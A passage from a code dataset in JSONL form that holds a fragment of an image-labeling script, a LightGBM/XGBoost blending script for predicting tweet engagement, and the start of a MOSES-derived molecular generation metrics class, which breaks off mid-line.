print(\"[INFO] %s %s is not exist.\" % (dataSetPath, image))\n\n # Initialize label matrix\n LABEL = [[0] * GRID_COL for i in range(GRID_ROW)]\n HPListIndex = 0\n now = datetime.datetime.now().strftime(\"%d %H:%M:%S\")\n imageListFile.close()\n print('[INFO][%s] %s_%d images are labeled' % (now, mapName, dataSetNum))\n","sub_path":"Labeler_test.py","file_name":"Labeler_test.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"430432055","text":"import time\n\nfrom Models.GBM.LightGBM import LightGBM\nfrom ParamTuning.Optimizer import Optimizer\nfrom Utils.Data import Data\nimport pandas as pd\n\nfrom Utils.Data.Data import get_dataset_xgb_batch\nfrom Utils.Data.Features.Generated.EnsemblingFeature.LGBMEnsemblingFeature import LGBMEnsemblingFeature\nfrom sklearn.model_selection import train_test_split\nimport time\nimport Blending.like_params as like_params\nimport Blending.reply_params as reply_params\nimport Blending.retweet_params as retweet_params\nimport Blending.comment_params as comment_params\nfrom Utils.Data.Features.Generated.EnsemblingFeature.XGBEnsembling import XGBEnsembling\nimport argparse\nfrom tqdm import tqdm\n\nfrom Utils.Data.Features.Generated.EnsemblingFeature.XGBFoldEnsembling import *\nfrom Utils.Submission.Submission import create_submission_file\n\n\ndef prediction(LGBM, dataset_id, df, label):\n\n tweets = Data.get_feature(\"raw_feature_tweet_id\", dataset_id)[\"raw_feature_tweet_id\"].array\n users = Data.get_feature(\"raw_feature_engager_id\", dataset_id)[\"raw_feature_engager_id\"].array\n\n # LGBM Prediction\n prediction_start_time = time.time()\n predictions = LGBM.get_prediction(df.to_numpy())\n print(f\"Prediction time: {time.time() - prediction_start_time} seconds\")\n\n # Uncomment to plot feature importance at the end of training\n # LGBM.plot_fimportance()\n\n create_submission_file(tweets, users, predictions, f\"{dataset_id}_{label}_lgbm_blending_submission.csv\")\n\n\ndef get_ensembling_label(label, dataset_id):\n from Utils.Data import Data\n return Data.get_feature_batch(f\"tweet_feature_engagement_is_{label}\",\n dataset_id, total_n_split=1, split_n=0, sample=0.3)\n\n\ndef get_nn_prediction(label, model_id, dataset_id):\n df = pd.read_csv(f'Dataset/Features/{dataset_id}/ensembling/nn_predictions_{label}_{model_id}.csv',\n header=None, names=[0, 1, 2], usecols=[2])\n df.columns = [f'nn_predictions_{label}_{model_id}']\n return df\n\ndef params_by_label(label):\n\n if label in [\"like\"]:\n lgbm_params = like_params.lgbm_get_params()\n xgb_params = like_params.xgb_get_params()\n elif label in [\"reply\"]:\n lgbm_params = reply_params.lgbm_get_params()\n xgb_params = reply_params.xgb_get_params()\n elif label in [\"retweet\"]:\n lgbm_params = retweet_params.lgbm_get_params()\n xgb_params = retweet_params.xgb_get_params()\n elif label in [\"comment\"]:\n lgbm_params = comment_params.lgbm_get_params()\n xgb_params = comment_params.xgb_get_params()\n else:\n assert False, \"What?\"\n\n return lgbm_params, xgb_params\n\n\ndef main():\n # Instantiate the parser\n parser = argparse.ArgumentParser()\n\n parser.add_argument('label', type=str,\n help='required argument: label')\n\n args = parser.parse_args()\n\n nn_labels = [\"like\", \"reply\", \"retweet\", \"comment\"]\n\n LABEL = args.label\n\n assert LABEL in [\"like\", \"reply\", \"retweet\", \"comment\"], \"LABEL not valid.\"\n\n print(f\"label is {LABEL}\")\n\n features = [\"raw_feature_creator_follower_count\",\n \"raw_feature_creator_following_count\",\n \"raw_feature_engager_follower_count\",\n \"raw_feature_engager_following_count\",\n \"raw_feature_creator_is_verified\",\n \"raw_feature_engager_is_verified\",\n \"raw_feature_engagement_creator_follows_engager\",\n \"tweet_feature_number_of_photo\",\n \"tweet_feature_number_of_video\",\n \"tweet_feature_number_of_gif\",\n \"tweet_feature_number_of_media\",\n \"tweet_feature_is_retweet\",\n \"tweet_feature_is_quote\",\n \"tweet_feature_is_top_level\",\n \"tweet_feature_number_of_hashtags\",\n \"tweet_feature_creation_timestamp_hour\",\n \"tweet_feature_creation_timestamp_week_day\",\n # \"tweet_feature_number_of_mentions\",\n \"tweet_feature_token_length\",\n \"tweet_feature_token_length_unique\",\n \"tweet_feature_text_topic_word_count_adult_content\",\n \"tweet_feature_text_topic_word_count_kpop\",\n \"tweet_feature_text_topic_word_count_covid\",\n \"tweet_feature_text_topic_word_count_sport\",\n \"number_of_engagements_with_language_like\",\n \"number_of_engagements_with_language_retweet\",\n \"number_of_engagements_with_language_reply\",\n \"number_of_engagements_with_language_comment\",\n \"number_of_engagements_with_language_negative\",\n \"number_of_engagements_with_language_positive\",\n \"number_of_engagements_ratio_like\",\n \"number_of_engagements_ratio_retweet\",\n \"number_of_engagements_ratio_reply\",\n \"number_of_engagements_ratio_comment\",\n \"number_of_engagements_ratio_negative\",\n \"number_of_engagements_ratio_positive\",\n \"number_of_engagements_between_creator_and_engager_like\",\n \"number_of_engagements_between_creator_and_engager_retweet\",\n \"number_of_engagements_between_creator_and_engager_reply\",\n \"number_of_engagements_between_creator_and_engager_comment\",\n \"number_of_engagements_between_creator_and_engager_negative\",\n \"number_of_engagements_between_creator_and_engager_positive\",\n \"creator_feature_number_of_like_engagements_received\",\n \"creator_feature_number_of_retweet_engagements_received\",\n \"creator_feature_number_of_reply_engagements_received\",\n \"creator_feature_number_of_comment_engagements_received\",\n \"creator_feature_number_of_negative_engagements_received\",\n \"creator_feature_number_of_positive_engagements_received\",\n \"creator_feature_number_of_like_engagements_given\",\n \"creator_feature_number_of_retweet_engagements_given\",\n \"creator_feature_number_of_reply_engagements_given\",\n \"creator_feature_number_of_comment_engagements_given\",\n \"creator_feature_number_of_negative_engagements_given\",\n \"creator_feature_number_of_positive_engagements_given\",\n \"engager_feature_number_of_like_engagements_received\",\n \"engager_feature_number_of_retweet_engagements_received\",\n \"engager_feature_number_of_reply_engagements_received\",\n \"engager_feature_number_of_comment_engagements_received\",\n \"engager_feature_number_of_negative_engagements_received\",\n \"engager_feature_number_of_positive_engagements_received\",\n \"number_of_engagements_like\",\n \"number_of_engagements_retweet\",\n \"number_of_engagements_reply\",\n \"number_of_engagements_comment\",\n \"number_of_engagements_negative\",\n \"number_of_engagements_positive\",\n \"engager_feature_number_of_previous_like_engagement\",\n \"engager_feature_number_of_previous_reply_engagement\",\n \"engager_feature_number_of_previous_retweet_engagement\",\n \"engager_feature_number_of_previous_comment_engagement\",\n \"engager_feature_number_of_previous_positive_engagement\",\n \"engager_feature_number_of_previous_negative_engagement\",\n \"engager_feature_number_of_previous_engagement\",\n \"engager_feature_number_of_previous_like_engagement_ratio_1\",\n \"engager_feature_number_of_previous_reply_engagement_ratio_1\",\n \"engager_feature_number_of_previous_retweet_engagement_ratio_1\",\n \"engager_feature_number_of_previous_comment_engagement_ratio_1\",\n \"engager_feature_number_of_previous_positive_engagement_ratio_1\",\n \"engager_feature_number_of_previous_negative_engagement_ratio_1\",\n \"engager_feature_number_of_previous_like_engagement_ratio\",\n \"engager_feature_number_of_previous_reply_engagement_ratio\",\n \"engager_feature_number_of_previous_retweet_engagement_ratio\",\n \"engager_feature_number_of_previous_comment_engagement_ratio\",\n \"engager_feature_number_of_previous_positive_engagement_ratio\",\n \"engager_feature_number_of_previous_negative_engagement_ratio\",\n \"engager_feature_number_of_previous_like_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_reply_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_retweet_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_comment_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_negative_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_positive_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_like_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_reply_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_retweet_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_comment_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_negative_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_positive_engagement_between_creator_and_engager_by_engager\",\n # \"tweet_feature_number_of_previous_like_engagements\",\n # \"tweet_feature_number_of_previous_reply_engagements\",\n # \"tweet_feature_number_of_previous_retweet_engagements\",\n # \"tweet_feature_number_of_previous_comment_engagements\",\n # \"tweet_feature_number_of_previous_positive_engagements\",\n # \"tweet_feature_number_of_previous_negative_engagements\",\n \"creator_feature_number_of_previous_like_engagements_given\",\n \"creator_feature_number_of_previous_reply_engagements_given\",\n \"creator_feature_number_of_previous_retweet_engagements_given\",\n \"creator_feature_number_of_previous_comment_engagements_given\",\n \"creator_feature_number_of_previous_positive_engagements_given\",\n \"creator_feature_number_of_previous_negative_engagements_given\",\n \"creator_feature_number_of_previous_like_engagements_received\",\n \"creator_feature_number_of_previous_reply_engagements_received\",\n \"creator_feature_number_of_previous_retweet_engagements_received\",\n \"creator_feature_number_of_previous_comment_engagements_received\",\n \"creator_feature_number_of_previous_positive_engagements_received\",\n \"creator_feature_number_of_previous_negative_engagements_received\",\n \"engager_feature_number_of_previous_like_engagement_with_language\",\n \"engager_feature_number_of_previous_reply_engagement_with_language\",\n \"engager_feature_number_of_previous_retweet_engagement_with_language\",\n \"engager_feature_number_of_previous_comment_engagement_with_language\",\n \"engager_feature_number_of_previous_positive_engagement_with_language\",\n \"engager_feature_number_of_previous_negative_engagement_with_language\",\n \"engager_feature_knows_hashtag_positive\",\n \"engager_feature_knows_hashtag_negative\",\n \"engager_feature_knows_hashtag_like\",\n \"engager_feature_knows_hashtag_reply\",\n \"engager_feature_knows_hashtag_rt\",\n \"engager_feature_knows_hashtag_comment\",\n \"creator_and_engager_have_same_main_language\",\n \"is_tweet_in_creator_main_language\",\n \"is_tweet_in_engager_main_language\",\n # \"statistical_probability_main_language_of_engager_engage_tweet_language_1\",\n # \"statistical_probability_main_language_of_engager_engage_tweet_language_2\",\n \"creator_and_engager_have_same_main_grouped_language\",\n \"is_tweet_in_creator_main_grouped_language\",\n \"is_tweet_in_engager_main_grouped_language\",\n # # \"hashtag_similarity_fold_ensembling_positive\",\n # # \"link_similarity_fold_ensembling_positive\",\n # # \"domain_similarity_fold_ensembling_positive\"\n \"tweet_feature_creation_timestamp_hour_shifted\",\n \"tweet_feature_creation_timestamp_day_phase\",\n \"tweet_feature_creation_timestamp_day_phase_shifted\"\n ]\n\n label = [\n f\"tweet_feature_engagement_is_{LABEL}\"\n ]\n\n train_dataset = \"cherry_train\"\n val_dataset = \"cherry_val\"\n test_dataset = \"new_test\"\n private_test_dataset = \"last_test\"\n\n ensembling_list_dict = {\n 'like': ['reply', 'retweet', 'comment'],\n 'reply': ['reply', 'retweet', 'comment'],\n 'retweet': ['reply', 'retweet', 'comment'],\n 'comment': ['reply', 'retweet', 'comment'],\n }\n\n ensembling_list = ensembling_list_dict[LABEL]\n\n ensembling_lgbm_params = {}\n ensembling_xgb_params = {}\n for ens_label in ensembling_list:\n ensembling_lgbm_params[ens_label], ensembling_xgb_params[ens_label] \\\n = params_by_label(ens_label)\n\n categorical_features_set = set([])\n\n\n # Load train data\n # loading_data_start_time = time.time()\n # df_train, df_train_label = Data.get_dataset_xgb(train_dataset, features, label)\n # print(f\"Loading train data time: {loading_data_start_time - time.time()} seconds\")\n\n # Load val data\n df_val, df_val_label = Data.get_dataset_xgb(val_dataset, features, label)\n\n # Load test data\n df_test = Data.get_dataset(features, test_dataset)\n df_private = Data.get_dataset(features, private_test_dataset)\n\n new_index = pd.Series(df_test.index).map(lambda x: x + len(df_val))\n df_test.set_index(new_index, inplace=True)\n\n new_index_private = pd.Series(df_private.index).map(lambda x: x + len(df_val) + len(df_test))\n df_private.set_index(new_index_private, inplace=True)\n\n\n # df to be predicted by the lgbm blending feature\n df_to_predict = pd.concat([df_val, df_test, df_private])\n\n # BLENDING FEATURE DECLARATION\n\n feature_list = []\n\n # NEW CODE ADDED\n\n df_train = pd.DataFrame(columns=features)\n df_train_label = pd.DataFrame(columns=label)\n need_to_load_train_set = False\n\n for ens_label in ensembling_list:\n lgbm_params = ensembling_lgbm_params[ens_label]\n for lgbm_param_dict in lgbm_params:\n start_time = time.time()\n if not LGBMEnsemblingFeature(dataset_id=private_test_dataset,\n df_train=df_train,\n df_train_label=get_ensembling_label(ens_label, train_dataset),\n df_to_predict=df_to_predict,\n param_dict=lgbm_param_dict,\n categorical_features_set=categorical_features_set).has_feature():\n print(f\"{ens_label} {lgbm_param_dict}\")\n need_to_load_train_set = True\n\n if need_to_load_train_set:\n df_train, df_train_label = get_dataset_xgb_batch(total_n_split=1, split_n=0, dataset_id=train_dataset,\n X_label=features, Y_label=label, sample=0.3)\n\n\n for ens_label in ensembling_list:\n lgbm_params = ensembling_lgbm_params[ens_label]\n for lgbm_param_dict in lgbm_params:\n start_time = time.time()\n feature_list.append(LGBMEnsemblingFeature(dataset_id=private_test_dataset,\n df_train=df_train,\n df_train_label=get_ensembling_label(ens_label, train_dataset),\n df_to_predict=df_to_predict,\n param_dict=lgbm_param_dict,\n categorical_features_set=categorical_features_set))\n\n # NEW PARTll\n # ONLY THIS PART IS NEW\n # LOAD THIS PART FIRST\n del df_train, df_train_label\n\n df_feature_list = [x.load_or_create() for x in tqdm(feature_list)]\n\n for ens_label in ensembling_list:\n start_time = time.time()\n if ens_label == \"like\":\n val_features_df = XGBFoldEnsemblingLike2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingLike2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingLike2(private_test_dataset).load_or_create()\n elif ens_label == \"retweet\":\n val_features_df = XGBFoldEnsemblingRetweet2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingRetweet2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingRetweet2(private_test_dataset).load_or_create()\n elif ens_label == \"reply\":\n val_features_df = XGBFoldEnsemblingReply2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingReply2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingReply2(private_test_dataset).load_or_create()\n elif ens_label == \"comment\":\n val_features_df = XGBFoldEnsemblingComment2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingComment2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingComment2(private_test_dataset).load_or_create()\n else:\n assert False, \"oh oh something went wrong. label not found\"\n\n test_features_df.set_index(new_index, inplace=True)\n private_features_df.set_index(new_index_private, inplace=True)\n\n xgb_feature_df = pd.concat([val_features_df, test_features_df, private_features_df])\n\n df_feature_list.append(xgb_feature_df)\n\n print(f\"time: {time.time() - start_time}\")\n\n del val_features_df, test_features_df, private_features_df\n\n\n # check dimensions\n len_val = len(df_val)\n len_test = len(df_test)\n len_private = len(df_private)\n\n for df_feat in df_feature_list:\n assert len(df_feat) == (len_val + len_test + len_private), \\\n f\"Blending features are not of dimension expected, len val: {len_val} len test: {len_test}\" \\\n f\" len private test: {len_private}\\n \" \\\n f\"obtained len: {len(df_feat)} of {df_feat.columns[0]}\\n\"\n\n # split feature dataframe in validation and testing\n df_feat_val_list = [df_feat.iloc[:len_val] for df_feat in df_feature_list]\n df_feat_test_list = [df_feat.iloc[len_val:-len_private] for df_feat in df_feature_list]\n df_feat_private_list = [df_feat.iloc[-len_private:] for df_feat in df_feature_list]\n\n df_feat_nn_val_list_1 = [get_nn_prediction(l, 1, val_dataset) for l in nn_labels]\n df_feat_nn_val_list_2 = [get_nn_prediction(l, 2, val_dataset) for l in nn_labels]\n df_feat_nn_val_list = df_feat_nn_val_list_1 + df_feat_nn_val_list_2\n\n df_feat_nn_test_list_1 = [get_nn_prediction(l, 1, test_dataset) for l in nn_labels]\n df_feat_nn_test_list_2 = [get_nn_prediction(l, 2, test_dataset) for l in nn_labels]\n df_feat_nn_test_list = df_feat_nn_test_list_1 + df_feat_nn_test_list_2\n\n df_feat_nn_private_list_1 = [get_nn_prediction(l, 1, private_test_dataset) for l in nn_labels]\n df_feat_nn_private_list_2 = [get_nn_prediction(l, 2, private_test_dataset) for l in nn_labels]\n df_feat_nn_private_list = df_feat_nn_private_list_1 + df_feat_nn_private_list_2\n\n for df_feat_nn_test in df_feat_nn_test_list:\n new_index = pd.Series(df_feat_nn_test.index).map(lambda x: x + len(df_val))\n df_feat_nn_test.set_index(new_index, inplace=True)\n\n for df_feat_nn_private in df_feat_nn_private_list:\n new_index_private = pd.Series(df_feat_nn_private.index).map(lambda x: x + len(df_val) + len(df_test))\n df_feat_nn_private.set_index(new_index_private, inplace=True)\n\n df_feat_val_list += df_feat_nn_val_list\n df_feat_test_list += df_feat_nn_test_list\n df_feat_private_list += df_feat_nn_private_list\n\n df_val_to_be_concatenated_list = [df_val] + df_feat_val_list + [df_val_label]\n df_test_to_be_concatenated_list = [df_test] + df_feat_test_list\n df_private_to_be_concatenated_list = [df_private] + df_feat_private_list\n\n # creating the new validation set on which we will do meta optimization\n df_val = pd.concat(df_val_to_be_concatenated_list, axis=1)\n df_test = pd.concat(df_test_to_be_concatenated_list, axis=1)\n df_private = pd.concat(df_private_to_be_concatenated_list, axis=1)\n\n # now we are in full meta-model mode\n # watchout! they are unsorted now, you got to re-sort the dfs\n df_metatrain, df_metaval = train_test_split(df_val, test_size=0.1, random_state=16+1)\n df_metatrain.sort_index(inplace=True)\n df_metaval.sort_index(inplace=True)\n\n # split dataframe columns in train and label\n col_names_list = [df_feat.columns[0] for df_feat in df_feature_list]\n\n extended_features = df_test.columns\n df_metatrain_label = df_metatrain[label]\n df_metatrain = df_metatrain[extended_features]\n\n df_metaval_label = df_metaval[label]\n df_metaval = df_metaval[extended_features]\n\n for i in range(len(df_metatrain.columns)):\n assert df_metatrain.columns[i] == df_test.columns[i], f'You fucked yourself. metatrain col {i}: {df_metatrain.columns[i]}' \\\n f' test col {i}: {df_test.columns[i]}'\n assert df_metatrain.columns[i] == df_private.columns[i], \\\n f'You fucked yourself. metatrain col {i}: {df_metatrain.columns[i]} private test col {i}: {df_test.columns[i]}'\n\n model_name = \"lightgbm_classifier\"\n kind = LABEL\n\n params = {\n 'num_leaves': 158.78294478107375,\n 'learning_rate': 0.01001509614042722,\n 'max_depth': 16,\n 'lambda_l1': 2.247948350186734,\n 'lambda_l2': 29.341017931146695,\n 'colsample_bynode': 0.4,\n 'colsample_bytree': 0.4697183272881687,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 7,\n 'max_bin': 4999.999999999999,\n 'min_data_in_leaf': 11.175673384174504,\n }\n\n LGBM = LightGBM(\n objective='binary',\n num_threads=-1,\n num_iterations=1500,\n early_stopping_rounds=20,\n **params,\n )\n\n # LGBM Training\n training_start_time = time.time()\n LGBM.fit(X=df_metatrain, Y=df_metatrain_label, X_val=df_metaval, Y_val=df_metaval_label,\n categorical_feature=set([]))\n print(f\"Training time: {time.time() - training_start_time} seconds\")\n\n # LGBM Evaluation\n evaluation_start_time = time.time()\n prauc, rce, conf, max_pred, min_pred, avg = LGBM.evaluate(df_metaval.to_numpy(), df_metaval_label.to_numpy())\n print(\"since I'm lazy I did the local test on the same test on which I did EarlyStopping\")\n print(f\"PRAUC:\\t{prauc}\")\n print(f\"RCE:\\t{rce}\")\n print(f\"TN:\\t{conf[0, 0]}\")\n print(f\"FP:\\t{conf[0, 1]}\")\n print(f\"FN:\\t{conf[1, 0]}\")\n print(f\"TP:\\t{conf[1, 1]}\")\n print(f\"MAX_PRED:\\t{max_pred}\")\n print(f\"MIN_PRED:\\t{min_pred}\")\n print(f\"AVG:\\t{avg}\")\n print(f\"Evaluation time: {time.time() - evaluation_start_time} seconds\")\n\n # public prediction\n prediction(LGBM=LGBM, dataset_id=test_dataset, df=df_test, label=LABEL)\n\n # private prediction\n prediction(LGBM=LGBM, dataset_id=private_test_dataset, df=df_private, label=LABEL)\n\n LGBM.permutation_importance(X_tst=df_metaval, Y_tst=df_metaval_label)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Blending/last_test_sub/last_blending_sub_comment.py","file_name":"last_blending_sub_comment.py","file_ext":"py","file_size_in_byte":24033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635343836","text":"\"\"\"\nAdapted from MOlecular SEtS (MOSES) benchmark\nhttps://github.com/molecularsets/moses\n\"\"\"\n\nimport warnings\nfrom multiprocessing import Pool\nimport numpy as np\nimport rdkit\nfrom scipy.spatial.distance import cosine as cos_distance\nfrom fcd_torch import FCD as FCDMetric\nfrom scipy.stats import wasserstein_distance\n\nfrom moleval.metrics.utils import mapper\nfrom moleval.metrics.utils import disable_rdkit_log, enable_rdkit_log\nfrom moleval.metrics.metrics_utils import SA, QED, NP, weight, logP\nfrom moleval.metrics.metrics_utils import compute_fragments, average_agg_tanimoto, \\\n compute_scaffolds, fingerprints, numpy_fps_to_bitvectors, sphere_exclusion,\\\n get_mol, canonic_smiles, mol_passes_filters, analogues_tanimoto, compute_functional_groups, compute_ring_systems\n\n\n# Modify this function so that it doesn't depend on metrics dataset\nclass GetMosesMetrics(object):\n \"\"\"\n Computes all available metrics between test (scaffold test)\n and generated sets of SMILES.\n Parameters:\n gen: list of generated SMILES\n n: Chunk size to calculate intermediate statistics\n n_col: Alternatively column name of batch/step variable e.g. \"step\"\n n_jobs: number of workers for parallel processing\n device: 'cpu' or 'cuda:n', where n is GPU device number\n batch_size: batch size for FCD metric\n pool: optional multiprocessing pool to use for parallelization\n test (None or list): test SMILES. If None, will not compare to test statistics\n test_scaffolds (None or list): scaffold test SMILES. If None, will not compare to\n scaffold test statistics\n ptest (None or dict): precalculated statistics of the test set. If\n None, will not run comparitive statistics. If you specified a custom\n test set, default test statistics will be ignored\n ptest_scaffolds (None or dict): precalculated statistics of the\n scaffold test set If None, will load default scaffold test\n statistics. If you specified a custom test set, default test\n statistics will be ignored\n ptarget (None or dict): precalculated statistics of the target set. If\n None, will not run comparitive statistics\n train (None or list): train SMILES. If None, will not run comparative statistics\n target (None or list): target SMILES. If none, will not run comparative statistics\n Available metrics:\n * %valid # Tracked by molscore and so unneccesary\n * Frechet ChemNet Distance (FCD)\n * Fragment similarity (Frag)\n * Scaffold similarity (Scaf)\n * Similarity to nearest neighbour (SNN)\n * Internal diversity (IntDiv)\n * Internal diversity 2: using square root of mean squared\n Tanimoto similarity (IntDiv2)\n * %passes filters (Filters)\n * Distribution difference for logP, SA, QED, weight\n * Novelty (molecules not present in train)\n \"\"\"\n # TODO add KL divergence?\n # TODO FG / RS inside / outside training data / reference dataset?\n # https://chemrxiv.org/articles/preprint/Comparative_Study_of_Deep_Generative_Models_on_Chemical_Space_Coverage/13234289\n # + most common scaff, unique_fg, unique_rs? train_fg_recoverd, test_fg_recovered, test etc.\n\n def __init__(self, n_jobs=1, device='cpu', batch_size=512, pool=None,\n test=None, test_scaffolds=None, ptest=None, ptest_scaffolds=None, train=None, ptrain=None,\n target=None, ptarget=None):\n self.n_jobs = n_jobs\n self.device = device\n self.batch_size = batch_size\n self.pool = pool\n self.close_pool = False\n self.test = test\n self.test_scaffolds = test_scaffolds\n self.train = train\n self.target = target\n # Clean up if necessary\n for att in ['test', 'test_scaffolds', 'target', 'train']:\n if getattr(self, att) is not None:\n setattr(self, att, remove_invalid(getattr(self, att), canonize=True))\n # FCD pre-statistics\n self.ptest = ptest\n self.ptest_scaffolds = ptest_scaffolds\n self.ptrain = ptrain\n self.ptarget = ptarget\n # Later defined\n self.kwargs = None\n self.kwargs_fcd = None\n self.test_int = None\n self.test_scaffolds_int = None\n self.target_int = None\n\n # Compute any pre-statistics if needed.\n disable_rdkit_log()\n if self.pool is None:\n if self.n_jobs != 1:\n self.pool = Pool(n_jobs)\n self.close_pool = True\n else:\n self.pool = 1\n self.kwargs = {'n_jobs': 1, 'device': self.device, 'batch_size': self.batch_size}\n self.kwargs_fcd = {'n_jobs': self.n_jobs, 'device': self.device, 'batch_size': self.batch_size,\n 'canonize': False}\n\n # If test and test_scaffolds provided calculate intermediate statistics\n if self.test is not None:\n print('Computing test pre-statistics')\n self.test_int = compute_intermediate_statistics(self.test, n_jobs=self.n_jobs,\n device=self.device, batch_size=self.batch_size,\n pool=self.pool)\n if self.test_scaffolds is not None:\n print('Computing test scaffold pre-statistics')\n self.test_scaffolds_int = compute_intermediate_statistics(self.test_scaffolds, n_jobs=self.n_jobs,\n device=self.device, batch_size=self.batch_size,\n pool=self.pool)\n if self.target is not None:\n print('Computing target pre-statistics')\n self.target_int = compute_intermediate_statistics(self.target, n_jobs=self.n_jobs,\n device=self.device, batch_size=self.batch_size,\n pool=self.pool)\n\n def calculate(self, gen, calc_valid=False, calc_unique=False, unique_k=None, se_k=1000):\n metrics = {}\n metrics['#'] = len(gen)\n\n # Calculate validity\n if calc_valid:\n metrics['Validity'] = fraction_valid(gen, self.pool)\n\n gen = remove_invalid(gen, canonize=True)\n #mols = mapper(self.pool)(get_mol, gen)\n metrics['# valid'] = len(gen)\n\n # Calculate Uniqueness\n if calc_unique:\n metrics['Uniqueness'] = fraction_unique(gen=gen, k=None, n_jobs=self.pool)\n if unique_k is not None:\n metrics[f'Unique@{unique_k/1000:.0f}k'] = fraction_unique(gen=gen, k=unique_k, n_jobs=self.pool)\n\n # Now subset only unique molecules\n gen = list(set(gen))\n mols = mapper(self.pool)(get_mol, gen)\n # Precalculate some things\n mol_fps = fingerprints(mols, self.pool, already_unique=True, fp_type='morgan')\n scaffs = compute_scaffolds(mols, n_jobs=self.n_jobs)\n scaff_gen = list(scaffs.keys())\n fgs = compute_functional_groups(mols, n_jobs=self.n_jobs)\n rss = compute_ring_systems(mols, n_jobs=self.n_jobs)\n scaff_mols = mapper(self.pool)(get_mol, scaff_gen)\n metrics['# valid & unique'] = len(gen)\n\n # Calculate diversity related metrics\n if self.train is not None:\n metrics['Novelty'] = novelty(gen, self.train, self.pool)\n metrics['IntDiv1'] = internal_diversity(gen=mol_fps, n_jobs=self.pool, device=self.device)\n metrics['IntDiv2'] = internal_diversity(gen=mol_fps, n_jobs=self.pool, device=self.device, p=2)\n metrics['SEDiv'] = se_diversity(gen=mols, n_jobs=self.pool)\n if (se_k is not None) and (len(gen) >= se_k):\n metrics[f'SEDiv@{se_k/1000:.0f}k'] = se_diversity(gen=mols, k=se_k, n_jobs=self.pool, normalize=True)\n metrics['ScaffDiv'] = internal_diversity(gen=scaff_mols, n_jobs=self.pool, device=self.device,\n fp_type='morgan')\n metrics['Scaff uniqueness'] = len(scaff_gen)/len(gen)\n # Calculate number of FG and RS relative to sample size\n metrics['FG'] = len(list(fgs.keys()))/len(gen)\n metrics['RS'] = len(list(rss.keys()))/len(gen)\n # Calculate % pass filters\n metrics['Filters'] = fraction_passes_filters(mols, self.pool)\n\n # Calculate FCD\n pgen = FCDMetric(**self.kwargs_fcd).precalc(gen)\n if self.ptrain:\n metrics['FCD_train'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptrain)\n if self.ptest:\n metrics['FCD_test'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptest)\n if self.ptest_scaffolds:\n metrics['FCD_testSF'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptest_scaffolds)\n if self.ptarget:\n metrics['FCD_target'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptarget)\n\n # Test metrics\n if self.test_int is not None:\n metrics['Novelty_test'] = novelty(gen, self.test, self.pool)\n metrics['AnalogueSimilarity_test'], metrics['AnalogueCoverage_test'] = \\\n FingerprintAnaloguesMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.test_int['Analogue'])\n metrics['FG_test'] = FGMetric(**self.kwargs)(pgen={'fgs': fgs}, pref=self.test_int['FG'])\n metrics['RS_test'] = RSMetric(**self.kwargs)(pgen={'rss': rss}, pref=self.test_int['RS'])\n metrics['SNN_test'] = SNNMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.test_int['SNN'])\n metrics['Frag_test'] = FragMetric(**self.kwargs)(gen=mols, pref=self.test_int['Frag'])\n metrics['Scaf_test'] = ScafMetric(**self.kwargs)(pgen={'scaf': scaffs}, pref=self.test_int['Scaf'])\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n metrics[f'{name}_test'] = WassersteinMetric(func, **self.kwargs)(gen=mols, pref=self.test_int[name])\n\n # Test scaff metrics\n if self.test_scaffolds_int is not None:\n metrics['SNN_testSF'] = SNNMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.test_scaffolds_int['SNN'])\n metrics['Frag_testSF'] = FragMetric(**self.kwargs)(gen=mols, pref=self.test_scaffolds_int['Frag'])\n metrics['Scaf_testSF'] = ScafMetric(**self.kwargs)(pgen={'scaf': scaffs}, pref=self.test_scaffolds_int['Scaf'])\n\n # Target metrics\n if self.target_int is not None:\n metrics['Novelty_target'] = novelty(gen, self.target, self.pool)\n metrics['AnalogueSimilarity_target'], metrics['AnalogueCoverage_target'] = \\\n FingerprintAnaloguesMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.target_int['Analogue'])\n metrics['FG_target'] = FGMetric(**self.kwargs)(pgen={'fgs': fgs}, pref=self.target_int['FG'])\n metrics['RS_target'] = RSMetric(**self.kwargs)(pgen={'rss': rss}, pref=self.target_int['RS'])\n metrics['SNN_target'] = SNNMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.target_int['SNN'])\n metrics['Frag_target'] = FragMetric(**self.kwargs)(gen=mols, pref=self.target_int['Frag'])\n metrics['Scaf_target'] = ScafMetric(**self.kwargs)(pgen={'scaf': scaffs}, pref=self.target_int['Scaf'])\n for name, func in [('logP', 